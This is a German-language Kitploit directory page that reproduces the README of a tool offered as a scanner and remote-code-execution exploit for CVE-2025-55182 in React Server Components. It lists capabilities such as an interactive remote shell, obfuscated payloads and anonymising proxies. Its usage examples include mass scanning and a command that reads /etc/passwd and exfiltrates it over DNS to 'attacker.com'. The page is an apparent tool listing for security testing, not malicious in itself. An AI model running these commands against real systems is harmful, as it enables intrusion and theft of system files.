Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Fortgeschrittener React Server Components RCE-Scanner für CVE-2025-55182. Funktionen: mehrstufiges Fingerprinting, Schwachstellenverifizierung, DNS-Exfiltration, interaktive Shell, Payload-Obfuskierung und professionelles Reporting (JSON/HTML/PDF). Nur autorisiertes Testen. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationDatenexfiltrationWAF-UmgehungPenetrationstestsRemote-Access-ToolPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Fortgeschrittener React Server Components RCE-Scanner für CVE-2025-55182. Funktionen: mehrstufiges Fingerprinting, Schwachstellenverifizierung, DNS-Exfiltration, interaktive Shell, Payload-Obfuskierung und professionelles Reporting (JSON/HTML/PDF). Nur autorisiertes Testen.

Repository anzeigen
134vor 2 MonatenNoch nicht geprüft
Teilen

🔐 ReactRCE-Scanner

CVE-2025-55182 — Fortgeschrittenes React Server Components RCE-Exploit- & Bewertungs-Framework

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Inhaltsverzeichnis

  • Rechtlicher Haftungsausschluss & ethischer Hinweis

  • Überblick

  • Kernfunktionen

  • Schnellstartanleitung

  • Architektur & detaillierte Funktionsanalyse

  • Konfigurationsreferenz

  • Automatisierte Testsuite

  • Behebung & Gegenmaßnahmen

  • Mitwirken & Community

  • Referenzen

  • Lizenz & Autor


⚠️ Rechtlicher Haftungsausschluss & ethischer Hinweis

Dieses Tool wurde ausschließlich für BILDUNGS- und AUTORISIERTE SICHERHEITSTEST-Zwecke entwickelt. Die unbefugte Nutzung dieser Software gegen Ziele ohne vorherige schriftliche Zustimmung stellt einen Verstoß gegen internationale Computerkriminalitätsgesetze dar, einschließlich des Computer Fraud and Abuse Act (CFAA), der DSGVO-Vorgaben und der üblichen Nutzungsbedingungen. Der Autor und die Mitwirkenden lehnen jegliche Haftung für Missbrauch, illegale Handlungen oder Folgeschäden ab, die aus diesem Programm resultieren. Die Nutzung erfolgt ausschließlich auf eigenes Risiko.


📋 Überblick

ReactRCE-Scanner ist ein unternehmensgerechtes Framework zur Sicherheitsbewertung und -verifizierung, das speziell für CVE-2025-55182 [1] entwickelt wurde, eine kritische Remote Code Execution (RCE)-Schwachstelle, die React Server Components in den Versionen 19.0.0 bis 19.2.0 betrifft.

Das Framework schließt die Lücke zwischen theoretischer Schwachstellenforschung und praktischer Sicherheitsvalidierung. Durch die Integration von mehrstufigem Fingerprinting, rigoroser Reduzierung von Fehlalarmen, fortschrittlicher Payload-Verschleierung und automatisierter Berichterstellung in mehreren Formaten bietet es Sicherheitsingenieuren präzise Diagnosefähigkeiten.

NutzungScan-Ergebnisse

🎯 Kernfunktionen

FunktionskategorieImplementierungs-HighlightBetriebsstatus
Intelligentes FingerprintingMulti-Source-Framework- und Versionserkennung mit Konfidenz-Bewertungsalgorithmen.✅
Mehrstufige Verifizierung5-stufige Validierungspipeline zur systematischen Eliminierung von Fehlalarmen.✅
Payload-GenerierungVerschleierter Payload-Builder mit Unterstützung für DNS-Exfiltration und Multi-Encoding.✅
Interaktive ShellEchtzeit-Pseudo-interaktive Befehlsausführung und Shell-Zugriff auf verifizierten Zielen.✅
Umfassende BerichterstellungAutomatisierte Berichterstellung in den Formaten JSON, HTML, PDF und Markdown.✅
DNS-ExfiltrationOut-of-Band-Befehlsausgabe-Exfiltration über sichere DNS-Abfrageverarbeitung.✅
Parallelisierungs-EngineHochperformante mehrthreadige Scan-Architektur für große Angriffsflächen.✅
Proxy-IntegrationHTTP/HTTPS- und SOCKS-Proxy-Unterstützung für anonymisierten Bewertungsverkehr.✅

🚀 Schnellstartanleitung

Installation

Klonen Sie das Repository und initialisieren Sie die Umgebung mithilfe des automatisierten Setup-Skripts oder der manuellen Abhängigkeitsinstallation:

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Grundlegende Befehlsreferenz

Das Framework arbeitet über eine modulare CLI-Architektur, die Einzelziel-Validierung, Massen-Scans aus Dateilisten, interaktives Shell-Spawning und Compliance-Berichterstellung unterstützt.

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Architektur & detaillierte Funktionsanalyse

1. Intelligente Fingerprinting-Engine

Das Framework führt eine tiefgehende Aufklärung vor der Payload-Übermittlung durch. Es analysiert mehrere HTTP-Header-Felder (X-Powered-By, Next-Action, RSC), strukturelle HTML-Meta-Tags (data-reactroot, __NEXT_DATA__), statische Build-Assets und JavaScript-Quellbundles [2] [3].

Konfidenzwerte werden in vier Stufen kategorisiert:

  • CRITICAL (95%+): Mehrere orthogonale Indikatoren bestätigen anfällige React Server Component Runtime-Versionen.

  • HIGH (75–95%): Starke strukturelle Indikatoren mit exakter Versionsübereinstimmung identifiziert.

  • MEDIUM (50–75%): Teilweise Framework-Marker vorhanden; manuelle Verifizierung erforderlich.

  • LOW (<50%): Schwache Heuristiken erkannt; hohe Wahrscheinlichkeit eines Fehlalarms.

2. Mehrstufiger Verifizierungs-Workflow

Um die Betriebsintegrität zu wahren und unbeabsichtigte Dienstunterbrechungen zu verhindern, durchlaufen Payloads eine strenge Validierungspipeline, bevor eine Exploit-Phase freigeschaltet wird.

Tool herunterladen